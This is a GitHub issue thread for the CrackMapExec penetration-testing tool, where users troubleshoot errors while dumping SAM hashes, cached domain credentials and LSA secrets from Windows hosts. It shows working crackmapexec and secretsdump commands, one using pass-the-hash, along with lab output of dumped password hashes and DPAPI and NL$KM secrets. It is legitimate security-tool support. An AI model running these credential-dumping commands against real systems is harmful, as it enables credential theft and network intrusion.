Closed juushya closed 8 years ago
@juushya can you please give me the command sting you ran? thanks!
Sure.
./crackmapexec.py X.X.X.X -d DOMAIN -u domainadmin -p password --lsa --sam
We're you using the latest version? Just tried it and it works for me:
#~ sudo crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' --sam --lsa
06-05-2016 13:42:32 CME 192.168.10.11:445 WIN7BOX [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)
06-05-2016 13:42:32 CME 192.168.10.11:445 WIN7BOX [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
06-05-2016 13:42:33 CME 192.168.10.11:445 WIN7BOX [+] Dumping local SAM hashes (uid:rid:lmhash:nthash)
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
06-05-2016 13:42:34 CME 192.168.10.11:445 WIN7BOX shazam:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
06-05-2016 13:42:36 CME 192.168.10.11:445 WIN7BOX [+] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
06-05-2016 13:42:36 CME 192.168.10.11:445 WIN7BOX yomama:4796a2aba0d3663e308939f43b157cad:LAB.LOCAL:LAB:::
06-05-2016 13:42:37 CME 192.168.10.11:445 WIN7BOX Administrator:dfb35a65f92d8af602f08e358a58dc42:LAB.LOCAL:LAB:::
06-05-2016 13:42:38 CME 192.168.10.11:445 WIN7BOX [+] Dumping LSA Secrets
06-05-2016 13:42:38 CME 192.168.10.11:445 WIN7BOX LAB\WIN7BOX$:aad3b435b51404eeaad3b435b51404ee:00d4ccabafb8a38a99ca6d35914c32b2:::
06-05-2016 13:42:39 CME 192.168.10.11:445 WIN7BOX DPAPI_SYSTEM:01000000b2936dbe72c61fc172ee2d73d74c4bb3df817b638fb10cefb2192b7d53310d21e32867fdac235c13
06-05-2016 13:42:39 CME 192.168.10.11:445 WIN7BOX NL$KM:d8ba73d489664670cc001c92a9a7c6b5f5521d2842e152152bab07afdd2ac8c9f22d04e778dd3dd30f580ed7b5d960af50fcaf57a071f25d92ba5f972a901c62
06-05-2016 13:42:39 [*] KTHXBYE!
Try installing the latest version from github and try again
Yes, using the latest version. These tracebacks were seen to occur for a few hosts only (Win 2K3 and Win 2k8), not for all hosts...
So, i've tried this on a Win 2k8 box and it works fine, I'll see if i can get my hands on a Win 2k3 image. In the meantime tho, I'm closing this since I cannot reproduce.
I know this is a very old issue, but I just received a stacktrace very similar to the third one, so I wanted to add my experience to this.
The stacktrace reads
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 384, in connectTree
return self._SMBConnection.connect_tree(share)
File "/usr/local/lib/python3.9/dist-packages/impacket/smb3.py", line 1025, in connectTree
if packet.isValidAnswer(STATUS_SUCCESS):
File "/usr/local/lib/python3.9/dist-packages/impacket/smb3structs.py", line 454, in isValidAnswer
raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/bin/cme", line 33, in <module>
sys.exit(load_entry_point('crackmapexec==5.1.7.dev0', 'console_scripts', 'crackmapexec')())
File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 272, in main
asyncio.run(
File "/usr/lib/python3.9/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/usr/lib/python3.9/asyncio/base_events.py", line 642, in run_until_complete
return future.result()
File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 102, in start_threadpool
await asyncio.gather(*jobs)
File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 68, in run_protocol
await asyncio.wait_for(
File "/usr/lib/python3.9/asyncio/tasks.py", line 442, in wait_for
return await fut
File "/usr/lib/python3.9/concurrent/futures/thread.py", line 58, in run
result = self.fn(*self.args, **self.kwargs)
File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 121, in __init__
connection.__init__(self, args, db, host)
File "/usr/lib/python3/dist-packages/cme/connection.py", line 59, in __init__
self.proto_flow()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 99, in proto_flow
self.call_cmd_args()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 106, in call_cmd_args
getattr(self, k)()
File "/usr/lib/python3/dist-packages/cme/connection.py", line 30, in _decorator
return func(self, *args, **kwargs)
File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 944, in sam
SAMFileName = self.remote_ops.saveSAM()
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/secretsdump.py", line 795, in saveSAM
return self.__retrieveHive('SAM')
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/secretsdump.py", line 790, in __retrieveHive
remoteFileName = RemoteFile(self.__smbConnection, 'SYSTEM32\\'+tmpFileName)
File "/usr/local/lib/python3.9/dist-packages/impacket/examples/secretsdump.py", line 298, in __init__
self.__tid = self.__smbConnection.connectTree('ADMIN$')
File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 386, in connectTree
raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
The stacktrace of secretsdump.py is pretty clear. This happens beacasue no ADMIN$
share is available on the target and indeed, a share listing shows that only IPC$
is enabled on this host (and a few others on the network I am currently testing).
I suppose this is an upstream bug in secretsdump.py?
I am however not using the most recent cme version (still running with 5.1.7dev on my default pentest Kali image; I should really configure the porchetta repository there...) and as I am currently short on time I cannot check if this might be fixed in the latest release.
try with secretdump, if same error then this is related to impacket
secretsdump handles this error more gracefully.
# secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:<HASH> Administrator@<IP>
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: <REDACTED>
[-] SAM hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[-] LSA hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Hey,
I am (mass) dumping sam + cached creds + lsa secrets from local boxes, using Domain Admin creds. In some cases, after dumping sam, CME throws the following traceback:
In some cases, the following second traceback is seen:
In other cases, the following third traceback is thrown immediately at start of sam dump (sam + cached creds + lsa secrets do not get dumped):
Domain Cached creds and lsa secrets do not get dumped.
Thanks.